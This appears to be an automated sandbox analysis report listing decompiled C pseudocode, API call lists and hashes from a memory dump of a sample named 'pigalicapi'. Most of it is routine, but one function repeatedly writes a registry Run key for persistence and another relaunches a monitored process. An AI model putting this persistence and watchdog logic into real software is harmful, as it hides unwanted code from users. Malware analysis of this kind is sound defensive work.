                                                                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                                                                            			E01174AC0(intOrPtr _a4) {
                                                                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                                                                            				long _v12;
                                                                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                                                                            				intOrPtr _t31;
                                                                                                                                                                                                                                                                            				void* _t50;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = _a4;
                                                                                                                                                                                                                                                                            				if(_v8 != 0) {
                                                                                                                                                                                                                                                                            					__imp__CoInitialize(0);
                                                                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                                                            						if( *((intOrPtr*)(_v8 + 8)) <= 0 || WaitForSingleObject( *(_v8 + 0x24), 0x64) != 0x102) {
                                                                                                                                                                                                                                                                            							L6:
                                                                                                                                                                                                                                                                            							Sleep(0x1388); // executed
                                                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						EnterCriticalSection(_v8 + 0xc);
                                                                                                                                                                                                                                                                            						_v20 = 0;
                                                                                                                                                                                                                                                                            						_v12 = 0;
                                                                                                                                                                                                                                                                            						_t31 = E01178250( *((intOrPtr*)(_v8 + 4)),  *((intOrPtr*)(_v8 + 8)),  &_v20,  &_v12); // executed
                                                                                                                                                                                                                                                                            						_t50 = _t50 + 0x10;
                                                                                                                                                                                                                                                                            						_v16 = _t31;
                                                                                                                                                                                                                                                                            						LeaveCriticalSection(_v8 + 0xc);
                                                                                                                                                                                                                                                                            						if(_v16 <= 0) {
                                                                                                                                                                                                                                                                            							goto L6;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						E011762B0(_v20, _v16); // executed
                                                                                                                                                                                                                                                                            						VirtualFree(_v20, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                            						SetEvent( *(_v8 + 0x24));
                                                                                                                                                                                                                                                                            						__imp__CoUninitialize();
                                                                                                                                                                                                                                                                            						goto L8;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				L8:
                                                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                                                            0x01174ac9
                                                                                                                                                                                                                                                                            0x01174ad0
                                                                                                                                                                                                                                                                            0x01174ad8
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01174ade
                                                                                                                                                                                                                                                                            0x01174ae5
                                                                                                                                                                                                                                                                            0x01174b80
                                                                                                                                                                                                                                                                            0x01174b85
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01174b85
                                                                                                                                                                                                                                                                            0x01174b08
                                                                                                                                                                                                                                                                            0x01174b0e
                                                                                                                                                                                                                                                                            0x01174b15
                                                                                                                                                                                                                                                                            0x01174b32
                                                                                                                                                                                                                                                                            0x01174b37
                                                                                                                                                                                                                                                                            0x01174b3a
                                                                                                                                                                                                                                                                            0x01174b44
                                                                                                                                                                                                                                                                            0x01174b4e
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01174b58
                                                                                                                                                                                                                                                                            0x01174b6b
                                                                                                                                                                                                                                                                            0x01174b78
                                                                                                                                                                                                                                                                            0x01174b90
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01174b90
                                                                                                                                                                                                                                                                            0x01174ade
                                                                                                                                                                                                                                                                            0x01174b96
                                                                                                                                                                                                                                                                            0x01174b9b

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 01174AD8
                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,00000064), ref: 01174AF4
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(-0000000C), ref: 01174B08
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(-0000000C), ref: 01174B44
                                                                                                                                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 01174B6B
                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?), ref: 01174B78
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00001388), ref: 01174B85
                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 01174B90
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterEventFreeInitializeLeaveObjectSingleSleepUninitializeVirtualWait
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3462651527-0
                                                                                                                                                                                                                                                                            • Opcode ID: 87cd08859b8dfa0f8bda7124e732b4d940b8f0b022129023d9843f78ed503f17
                                                                                                                                                                                                                                                                            • Instruction ID: d68dfcadaa1aa97a8cd441fd48ac5a72d869a0907156b89b605100dece7d094e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 87cd08859b8dfa0f8bda7124e732b4d940b8f0b022129023d9843f78ed503f17
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50216D74900209EFD718DBA8D948FAEB7B9EB48301F208598E515A7385D735EE80CBD0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                                                                            			E011777B0(void** _a4) {
                                                                                                                                                                                                                                                                            				void** _v8;
                                                                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                                                                            				long _v16;
                                                                                                                                                                                                                                                                            				long _v20;
                                                                                                                                                                                                                                                                            				long _v24;
                                                                                                                                                                                                                                                                            				void** _v28;
                                                                                                                                                                                                                                                                            				int _t37;
                                                                                                                                                                                                                                                                            				void* _t40;
                                                                                                                                                                                                                                                                            				void* _t60;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				if(_a4 != 0) {
                                                                                                                                                                                                                                                                            					__imp__CoInitialize(0);
                                                                                                                                                                                                                                                                            					_v12 = 0x96;
                                                                                                                                                                                                                                                                            					_v16 = 0x1388;
                                                                                                                                                                                                                                                                            					_v8 = _a4;
                                                                                                                                                                                                                                                                            					if( *_v8 != 0) {
                                                                                                                                                                                                                                                                            						_v20 = 0;
                                                                                                                                                                                                                                                                            						while(_v20 < 0x96) {
                                                                                                                                                                                                                                                                            							_v24 = 0;
                                                                                                                                                                                                                                                                            							_t37 = GetExitCodeProcess(_v8[3],  &_v24); // executed
                                                                                                                                                                                                                                                                            							if(_t37 == 0) {
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								if(_v24 != 0x103) {
                                                                                                                                                                                                                                                                            									CloseHandle(_v8[3]);
                                                                                                                                                                                                                                                                            									Sleep(0x7530);
                                                                                                                                                                                                                                                                            									_t40 = E01172070( *_v8);
                                                                                                                                                                                                                                                                            									_t60 = _t60 + 4;
                                                                                                                                                                                                                                                                            									_v8[3] = _t40;
                                                                                                                                                                                                                                                                            									if(_v8[3] != 0) {
                                                                                                                                                                                                                                                                            										_v20 = _v20 + 1;
                                                                                                                                                                                                                                                                            										if((_v8[2] & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                            											E01172510(_v8[3], 0x117e290);
                                                                                                                                                                                                                                                                            											_t60 = _t60 + 8;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										goto L11;
                                                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									Sleep(0x1388); // executed
                                                                                                                                                                                                                                                                            									L11:
                                                                                                                                                                                                                                                                            									continue;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						VirtualFree( *_v8, 0, 0x8000);
                                                                                                                                                                                                                                                                            						_v28 = _v8;
                                                                                                                                                                                                                                                                            						E011797C0(_v28);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					__imp__CoUninitialize();
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                                                            0x011777ba
                                                                                                                                                                                                                                                                            0x011777c2
                                                                                                                                                                                                                                                                            0x011777c8
                                                                                                                                                                                                                                                                            0x011777cf
                                                                                                                                                                                                                                                                            0x011777d9
                                                                                                                                                                                                                                                                            0x011777e2
                                                                                                                                                                                                                                                                            0x011777e8
                                                                                                                                                                                                                                                                            0x011777ef
                                                                                                                                                                                                                                                                            0x011777fc
                                                                                                                                                                                                                                                                            0x0117780e
                                                                                                                                                                                                                                                                            0x01177816
                                                                                                                                                                                                                                                                            0x01177818
                                                                                                                                                                                                                                                                            0x0117781f
                                                                                                                                                                                                                                                                            0x01177835
                                                                                                                                                                                                                                                                            0x01177840
                                                                                                                                                                                                                                                                            0x0117784c
                                                                                                                                                                                                                                                                            0x01177851
                                                                                                                                                                                                                                                                            0x01177857
                                                                                                                                                                                                                                                                            0x01177861
                                                                                                                                                                                                                                                                            0x0117786d
                                                                                                                                                                                                                                                                            0x01177879
                                                                                                                                                                                                                                                                            0x01177887
                                                                                                                                                                                                                                                                            0x0117788c
                                                                                                                                                                                                                                                                            0x0117788c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01177863
                                                                                                                                                                                                                                                                            0x01177821
                                                                                                                                                                                                                                                                            0x01177826
                                                                                                                                                                                                                                                                            0x0117788f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01177893
                                                                                                                                                                                                                                                                            0x0117781f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01177816
                                                                                                                                                                                                                                                                            0x011778a5
                                                                                                                                                                                                                                                                            0x011778ae
                                                                                                                                                                                                                                                                            0x011778b5
                                                                                                                                                                                                                                                                            0x011778ba
                                                                                                                                                                                                                                                                            0x011778bd
                                                                                                                                                                                                                                                                            0x011778bd
                                                                                                                                                                                                                                                                            0x011778c8

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 011777C2
                                                                                                                                                                                                                                                                            • GetExitCodeProcess.KERNEL32 ref: 0117780E
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00001388), ref: 01177826
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00001388), ref: 01177835
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00007530), ref: 01177840
                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000096,00000000,00008000), ref: 011778A5
                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 011778BD
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Sleep$CloseCodeExitFreeHandleInitializeProcessUninitializeVirtual
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2326833528-0
                                                                                                                                                                                                                                                                            • Opcode ID: 761df2d2f710420ab534aa77cffb8eeb6ad6bfbf3f6a6888ba8eb50a3b6e5087
                                                                                                                                                                                                                                                                            • Instruction ID: 5cf0ae1e844ed98917be9ff5abeb64feb85e0bba0267920cf1b2f7ba56815b4c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 761df2d2f710420ab534aa77cffb8eeb6ad6bfbf3f6a6888ba8eb50a3b6e5087
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AB315E7490020AEFDB18CFA4D848BAEB7B1FB49305F2485A8E505A7384D7759E40CFD1
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E01175CD0(CHAR* _a4) {
                                                                                                                                                                                                                                                                            				long _v8;
                                                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                                                            				long _v16;
                                                                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                                                                            				long _v24;
                                                                                                                                                                                                                                                                            				void* _t29;
                                                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 != 0 && lstrlenA(_a4) >= 4) {
                                                                                                                                                                                                                                                                            					_t29 = CreateFileA(_a4, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                                                                                                                                                                                                                                                                            					_v12 = _t29;
                                                                                                                                                                                                                                                                            					if(_v12 != 0xffffffff) {
                                                                                                                                                                                                                                                                            						_v16 = GetFileSize(_v12, 0);
                                                                                                                                                                                                                                                                            						if(_v16 > 0) {
                                                                                                                                                                                                                                                                            							_t34 = VirtualAlloc(0, _v16, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                            							_v20 = _t34;
                                                                                                                                                                                                                                                                            							if(_v20 != 0) {
                                                                                                                                                                                                                                                                            								_v24 = 0;
                                                                                                                                                                                                                                                                            								ReadFile(_v12, _v20, _v16,  &_v24, 0); // executed
                                                                                                                                                                                                                                                                            								if(_v24 == _v16) {
                                                                                                                                                                                                                                                                            									_v8 = E011716F0(_v20, _v16);
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								VirtualFree(_v20, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						FindCloseChangeNotification(_v12); // executed
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                                                                            0x01175cd6
                                                                                                                                                                                                                                                                            0x01175ce1
                                                                                                                                                                                                                                                                            0x01175d10
                                                                                                                                                                                                                                                                            0x01175d16
                                                                                                                                                                                                                                                                            0x01175d1d
                                                                                                                                                                                                                                                                            0x01175d2f
                                                                                                                                                                                                                                                                            0x01175d36
                                                                                                                                                                                                                                                                            0x01175d45
                                                                                                                                                                                                                                                                            0x01175d4b
                                                                                                                                                                                                                                                                            0x01175d52
                                                                                                                                                                                                                                                                            0x01175d54
                                                                                                                                                                                                                                                                            0x01175d6d
                                                                                                                                                                                                                                                                            0x01175d79
                                                                                                                                                                                                                                                                            0x01175d8b
                                                                                                                                                                                                                                                                            0x01175d8b
                                                                                                                                                                                                                                                                            0x01175d99
                                                                                                                                                                                                                                                                            0x01175d99
                                                                                                                                                                                                                                                                            0x01175d52
                                                                                                                                                                                                                                                                            0x01175da3
                                                                                                                                                                                                                                                                            0x01175da3
                                                                                                                                                                                                                                                                            0x01175d1d
                                                                                                                                                                                                                                                                            0x01175daf

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 01175CEB
                                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01175D10
                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(000000FF,00000000), ref: 01175D29
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 01175D45
                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 01175D6D
                                                                                                                                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 01175D99
                                                                                                                                                                                                                                                                            • FindCloseChangeNotification.KERNEL32(000000FF), ref: 01175DA3
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$Virtual$AllocChangeCloseCreateFindFreeNotificationReadSizelstrlen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 443218420-0
                                                                                                                                                                                                                                                                            • Opcode ID: 385301c6ab3789b66ce0772ac8117b19f8a3eeeaaa77ec0da179049988cc9d5c
                                                                                                                                                                                                                                                                            • Instruction ID: 1d26ed2a55e0a0938faf61974ad648fea8246ced233376e293e8af6594dd1f6d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 385301c6ab3789b66ce0772ac8117b19f8a3eeeaaa77ec0da179049988cc9d5c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E211D79E00209FFEB68DFA4DC49BAE7B75AB48701F108558F615A73C4C7749A81CB90
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E011712D0(CHAR* _a4) {
                                                                                                                                                                                                                                                                            				CHAR* _v8;
                                                                                                                                                                                                                                                                            				char* _v12;
                                                                                                                                                                                                                                                                            				CHAR* _v16;
                                                                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                                                                            				void* _v24;
                                                                                                                                                                                                                                                                            				int _v28;
                                                                                                                                                                                                                                                                            				long _t26;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = _a4;
                                                                                                                                                                                                                                                                            				if(_v8 != 0) {
                                                                                                                                                                                                                                                                            					_v16 = _v8;
                                                                                                                                                                                                                                                                            					_v12 = "software\\microsoft\\windows\\currentversion\\run";
                                                                                                                                                                                                                                                                            					while( *0x1184370 == 0) {
                                                                                                                                                                                                                                                                            						_v20 = 0x80000001;
                                                                                                                                                                                                                                                                            						if(( *(_v8 + 0x30c) & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            							_v20 = 0x80000002;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v24 = 0;
                                                                                                                                                                                                                                                                            						_t26 = RegOpenKeyExA(_v20, _v12, 0, 0xf003f,  &_v24); // executed
                                                                                                                                                                                                                                                                            						if(_t26 == 0) {
                                                                                                                                                                                                                                                                            							_v28 = lstrlenA(_v16);
                                                                                                                                                                                                                                                                            							RegSetValueExA(_v24, _v8 + 0x208, 0, 1, _v16, _v28); // executed
                                                                                                                                                                                                                                                                            							RegCloseKey(_v24); // executed
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						Sleep(0x1388); // executed
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                                                                            0x011712d9
                                                                                                                                                                                                                                                                            0x011712e0
                                                                                                                                                                                                                                                                            0x011712e9
                                                                                                                                                                                                                                                                            0x011712ec
                                                                                                                                                                                                                                                                            0x011712f3
                                                                                                                                                                                                                                                                            0x01171301
                                                                                                                                                                                                                                                                            0x01171314
                                                                                                                                                                                                                                                                            0x01171316
                                                                                                                                                                                                                                                                            0x01171316
                                                                                                                                                                                                                                                                            0x0117131d
                                                                                                                                                                                                                                                                            0x01171337
                                                                                                                                                                                                                                                                            0x0117133f
                                                                                                                                                                                                                                                                            0x0117134b
                                                                                                                                                                                                                                                                            0x01171368
                                                                                                                                                                                                                                                                            0x01171372
                                                                                                                                                                                                                                                                            0x01171372
                                                                                                                                                                                                                                                                            0x0117137d
                                                                                                                                                                                                                                                                            0x0117137d
                                                                                                                                                                                                                                                                            0x011712fc
                                                                                                                                                                                                                                                                            0x0117138d

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,00000000), ref: 01171337
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 01171345
                                                                                                                                                                                                                                                                            • RegSetValueExA.KERNELBASE(00000000,-00000208,00000000,00000001,?,?), ref: 01171368
                                                                                                                                                                                                                                                                            • RegCloseKey.KERNEL32(00000000), ref: 01171372
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00001388), ref: 0117137D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseOpenSleepValuelstrlen
                                                                                                                                                                                                                                                                            • String ID: software\microsoft\windows\currentversion\run
                                                                                                                                                                                                                                                                            • API String ID: 3411147897-1396020897
                                                                                                                                                                                                                                                                            • Opcode ID: c24d46dc3cc3c73a2fae5e07b38ec0588ad506b167f3726a8ae0fe9c613f4fbb
                                                                                                                                                                                                                                                                            • Instruction ID: 0ab55a520ce2ecea05a5241e46f9726dea06772221bb8d8eaa69ee55f7872b60
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c24d46dc3cc3c73a2fae5e07b38ec0588ad506b167f3726a8ae0fe9c613f4fbb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC212174A4420AFFDB18CFE8C949BAEBBB4FB45301F108258E611A7385D7749A40CBE1
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E01175B50(CHAR* _a4, char* _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                                                                            				long _v20;
                                                                                                                                                                                                                                                                            				void* _v24;
                                                                                                                                                                                                                                                                            				int _v28;
                                                                                                                                                                                                                                                                            				int _v32;
                                                                                                                                                                                                                                                                            				char* _v36;
                                                                                                                                                                                                                                                                            				char* _v40;
                                                                                                                                                                                                                                                                            				void* _v44;
                                                                                                                                                                                                                                                                            				void* _t69;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 != 0 && _a8 != 0 && _a12 != 0) {
                                                                                                                                                                                                                                                                            					_v32 = lstrlenA(_a8);
                                                                                                                                                                                                                                                                            					_v28 = lstrlenA(_a4);
                                                                                                                                                                                                                                                                            					_v24 = 0;
                                                                                                                                                                                                                                                                            					_v16 = 0;
                                                                                                                                                                                                                                                                            					while(_v24 < _v28) {
                                                                                                                                                                                                                                                                            						_v36 = StrStrIA( &(_a4[_v24]), _a8);
                                                                                                                                                                                                                                                                            						if(_v36 != 0) {
                                                                                                                                                                                                                                                                            							_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                            							_v24 = _v36 - _a4 + _v32;
                                                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v20 = _v16 * 0x28;
                                                                                                                                                                                                                                                                            					_t69 = VirtualAlloc(0, _v20, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                            					_v12 = _t69;
                                                                                                                                                                                                                                                                            					if(_v12 != 0) {
                                                                                                                                                                                                                                                                            						_v24 = 0;
                                                                                                                                                                                                                                                                            						_v16 = 0;
                                                                                                                                                                                                                                                                            						while(_v24 < _v28) {
                                                                                                                                                                                                                                                                            							_v40 = StrStrIA( &(_a4[_v24]), _a8);
                                                                                                                                                                                                                                                                            							if(_v40 != 0) {
                                                                                                                                                                                                                                                                            								lstrcpynA(_v12 + _v16 * 0x28,  &(_a4[_v24]), _v40 -  &(_a4[_v24]) + 1);
                                                                                                                                                                                                                                                                            								_v24 = _v40 - _a4 + _v32;
                                                                                                                                                                                                                                                                            								_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                            								_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                            								 *_a12 = _v12;
                                                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						if(_a16 != 0) {
                                                                                                                                                                                                                                                                            							_v44 = VirtualAlloc(0, _v20, 0x3000, 4);
                                                                                                                                                                                                                                                                            							if(_v44 != 0) {
                                                                                                                                                                                                                                                                            								E01177B70(_v44, _v12, _v20);
                                                                                                                                                                                                                                                                            								 *_a16 = _v44;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                                                                            0x01175b56
                                                                                                                                                                                                                                                                            0x01175b61
                                                                                                                                                                                                                                                                            0x01175b85
                                                                                                                                                                                                                                                                            0x01175b92
                                                                                                                                                                                                                                                                            0x01175b95
                                                                                                                                                                                                                                                                            0x01175b9c
                                                                                                                                                                                                                                                                            0x01175ba3
                                                                                                                                                                                                                                                                            0x01175bbc
                                                                                                                                                                                                                                                                            0x01175bc3
                                                                                                                                                                                                                                                                            0x01175bcb
                                                                                                                                                                                                                                                                            0x01175bd7
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01175bde
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01175bc3
                                                                                                                                                                                                                                                                            0x01175be6
                                                                                                                                                                                                                                                                            0x01175bf6
                                                                                                                                                                                                                                                                            0x01175bfc
                                                                                                                                                                                                                                                                            0x01175c03
                                                                                                                                                                                                                                                                            0x01175c09
                                                                                                                                                                                                                                                                            0x01175c10
                                                                                                                                                                                                                                                                            0x01175c17
                                                                                                                                                                                                                                                                            0x01175c30
                                                                                                                                                                                                                                                                            0x01175c37
                                                                                                                                                                                                                                                                            0x01175c59
                                                                                                                                                                                                                                                                            0x01175c68
                                                                                                                                                                                                                                                                            0x01175c71
                                                                                                                                                                                                                                                                            0x01175c7a
                                                                                                                                                                                                                                                                            0x01175c87
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01175c87
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01175c37
                                                                                                                                                                                                                                                                            0x01175c8f
                                                                                                                                                                                                                                                                            0x01175ca4
                                                                                                                                                                                                                                                                            0x01175cab
                                                                                                                                                                                                                                                                            0x01175cb9
                                                                                                                                                                                                                                                                            0x01175cc7
                                                                                                                                                                                                                                                                            0x01175cc7
                                                                                                                                                                                                                                                                            0x01175cab
                                                                                                                                                                                                                                                                            0x01175c8f
                                                                                                                                                                                                                                                                            0x01175c03
                                                                                                                                                                                                                                                                            0x01175ccf

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 01175B7F
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 01175B8C
                                                                                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,00000000), ref: 01175BB6
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 01175BF6
                                                                                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,00000000), ref: 01175C2A
                                                                                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,00000000,-00000001), ref: 01175C59
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 01175C9E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
